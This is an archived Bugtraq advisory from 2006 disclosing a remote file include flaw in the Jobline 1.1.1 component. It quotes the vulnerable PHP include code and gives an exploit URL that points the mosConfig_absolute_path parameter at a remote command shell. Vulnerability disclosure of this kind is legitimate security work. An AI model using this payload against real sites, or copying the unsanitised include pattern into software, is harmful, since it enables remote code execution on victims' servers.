Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Jobline 1 1 1 Version - Remote File Include Vulnerability

From: SpC-x () Bsdmail Org
Date: 13 Jun 2006 18:41:18 -0000
# SaVSaK.CoM | SpC-x - The_BeKiR |

# Jobline 1 1 1 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Jobline

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :


# if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) {
#       include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php");
# } else {
#       include_once("$mosConfig_absolute_path/components/$option/language/english.php");
# }

# Vulnerable :

# http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=Command-Shell
Previous By Date Next
Previous By Thread Next

Current thread: